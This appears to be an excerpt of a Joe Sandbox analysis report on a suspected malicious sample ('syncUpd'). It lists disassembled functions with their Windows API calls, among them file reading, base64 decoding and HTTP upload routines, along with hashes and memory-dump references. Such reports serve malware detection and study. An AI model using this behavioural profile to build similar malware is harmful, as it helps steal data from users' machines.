                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2775534915-0
                                                                                                                                                                                                                                                              • Opcode ID: 052790cbe17dc3a494b0e92ade055a40f0788430fa2dcaf8ae6e7200905dd4d4
                                                                                                                                                                                                                                                              • Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 052790cbe17dc3a494b0e92ade055a40f0788430fa2dcaf8ae6e7200905dd4d4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 009054C7: GetSystemTime.KERNEL32(0041D7D7,00624AA0,0041D129,?,?,008F1620,?,0000001A,0041D7D7,00000000,?,006249EC,?,004215A4,0041D7D6), ref: 009054ED
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008FC93A
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008FCA7E
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 008FCA85
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FCBBF
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBD8), ref: 008FCBCE
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FCBE1
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBDC), ref: 008FCBF0
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FCC03
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE0), ref: 008FCC12
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FCC25
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE4), ref: 008FCC34
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FCC47
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE8), ref: 008FCC56
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FCC69
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBEC), ref: 008FCC78
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FCC8B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBF0), ref: 008FCC9A
                                                                                                                                                                                                                                                                • Part of subcall function 00907087: lstrlen.KERNEL32(008F4E2C,?,?,008F4E2C,0041D79A), ref: 00907092
                                                                                                                                                                                                                                                                • Part of subcall function 00907087: lstrcpy.KERNEL32(0041D79A,00000000), ref: 009070EC
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 008FCCE1
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 008FCCF0
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 008FCD39
                                                                                                                                                                                                                                                                • Part of subcall function 009072D7: StrCmpCA.SHLWAPI(DKb,008FA2AE,?,008FA2AE,00624B44), ref: 009072F6
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 008FCD65
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1973479514-0
                                                                                                                                                                                                                                                              • Opcode ID: 32b03903aea3df50e8a80283c090f6865379caf8b03cf1ca1c3a0eea1c34ea05
                                                                                                                                                                                                                                                              • Instruction ID: db4422a448f716bef7efc5d3f21ddcf08a7e0b0484af028162a235ef9caa908f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32b03903aea3df50e8a80283c090f6865379caf8b03cf1ca1c3a0eea1c34ea05
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CBE109B2D04109AFCB14EBE0DD96EEEB339BF94711F104159F206A61E1DE35BA05CBA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00907007: lstrcpy.KERNEL32(?,00000000), ref: 0090704D
                                                                                                                                                                                                                                                                • Part of subcall function 008F46D7: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008F475D
                                                                                                                                                                                                                                                                • Part of subcall function 008F46D7: InternetCrackUrlA.WININET(00000000,00000000), ref: 008F476D
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008F590F
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00624C68), ref: 008F592A
                                                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008F5AAA
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,0041E0DC,00000000,?,006248EC,00000000,?,00624AE4,00000000,?,0041E0D8), ref: 008F5D85
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008F5D96
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 008F5DA7
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 008F5DAE
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008F5DC3
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 008F5DDA
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008F5DEC
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008F5E05
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 008F5E12
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 008F5E2F
                                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 008F5E43
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 008F5E60
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 008F5EC4
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 008F5ED1
                                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,00624C84,?,00624AB0,00000000,00000000,00400100,00000000), ref: 008F5B0F
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 008F5EDB
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 36004537-0
                                                                                                                                                                                                                                                              • Opcode ID: 8b814884cedf4fc81417a9552fa435a5da42abb82068080e2803263974605ad5
                                                                                                                                                                                                                                                              • Instruction ID: 8890a41f367e191af8af4bc5806cb1252b008577fbae0a557c1fc3a96a11f615
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b814884cedf4fc81417a9552fa435a5da42abb82068080e2803263974605ad5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA12B776D18118AECB25EBA0DC95FEEB379BF94710F104299B106A21D1EF706A49CF90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00964580,00000000,?,0041DBAC,00000000,?,?), ref: 0040C1D6
                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C1F3
                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C1FF
                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040C212
                                                                                                                                                                                                                                                                • Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8
                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040C242
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,00964550,0041D72E), ref: 0040C260
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,00964478), ref: 0040C287
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,00965088,00000000,?,0041DBB8,00000000,?,00000000,00000000,?,0095DB50,00000000,?,0041DBB4,00000000,?), ref: 0040C405
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,00965248), ref: 0040C41C
                                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: memset.MSVCRT ref: 0040BFC3
                                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0095DA40), ref: 0040BFE1
                                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
                                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: memcpy.MSVCRT ref: 0040C082
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,00965248,00000000,?,0041DBBC,00000000,?,00000000,0095DA40), ref: 0040C4BD
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,0095DB00), ref: 0040C4D4
                                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
                                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
                                                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040C5A7
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C5F9
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmallocmemcpymemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3538457421-3916222277
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00624E08,00000000,?,0041DBAC,00000000,?,?), ref: 008FC43D
                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 008FC45A
                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 008FC466
                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 008FC479
                                                                                                                                                                                                                                                                • Part of subcall function 00905257: malloc.MSVCRT ref: 0090525F
                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 008FC4A9
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,006249AC,0041D72E), ref: 008FC4C7
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,00624B58), ref: 008FC4EE
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,00624CB4,00000000,?,0041DBB8,00000000,?,00000000,00000000,?,00624958,00000000,?,0041DBB4,00000000,?), ref: 008FC66C
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,00624CB0), ref: 008FC683
                                                                                                                                                                                                                                                                • Part of subcall function 008FC1F7: memset.MSVCRT ref: 008FC22A
                                                                                                                                                                                                                                                                • Part of subcall function 008FC1F7: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 008FC248
                                                                                                                                                                                                                                                                • Part of subcall function 008FC1F7: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 008FC253
                                                                                                                                                                                                                                                                • Part of subcall function 008FC1F7: memcpy.MSVCRT ref: 008FC2E9
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,00624CB0,00000000,?,0041DBBC,00000000,?,00000000,006248DC), ref: 008FC724
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,00624D8C), ref: 008FC73B
                                                                                                                                                                                                                                                                • Part of subcall function 008FC1F7: lstrcat.KERNEL32(?,0041D726), ref: 008FC31A
                                                                                                                                                                                                                                                                • Part of subcall function 008FC1F7: lstrcat.KERNEL32(?,0041D727), ref: 008FC32E
                                                                                                                                                                                                                                                                • Part of subcall function 008FC1F7: lstrcat.KERNEL32(?,0041D72A), ref: 008FC34F
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 008FC80E
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 008FC860
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmallocmemcpymemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3538457421-3916222277
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                                              • String ID: block
                                                                                                                                                                                                                                                              • API String ID: 3407564107-2199623458
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040F667
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040FA8F
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0095C850,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 348468850-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00411F4E
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00411F65
                                                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00411F9C
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00964928), ref: 00411FBB
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00411FCF
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,009645B0), ref: 00411FE3
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                                                                • Part of subcall function 004096C0: StrStrA.SHLWAPI(00000000,00964490), ref: 0040971B
                                                                                                                                                                                                                                                                • Part of subcall function 004096C0: memcmp.MSVCRT ref: 00409774
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CloseHandle.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                                • Part of subcall function 00415AC0: GlobalAlloc.KERNEL32(00000000,00412087,00412087), ref: 00415AD3
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,00964A18), ref: 0041209D
                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00412199
                                                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0041212A
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D4AB,?,?,?,?,000003E8), ref: 00412147
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 00412159
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 0041216C
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,0041D840), ref: 0041217B
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1812951797-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 009021B5
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 009021CC
                                                                                                                                                                                                                                                                • Part of subcall function 00905747: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00905772
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00902203
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00624B00), ref: 00902222
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00902236
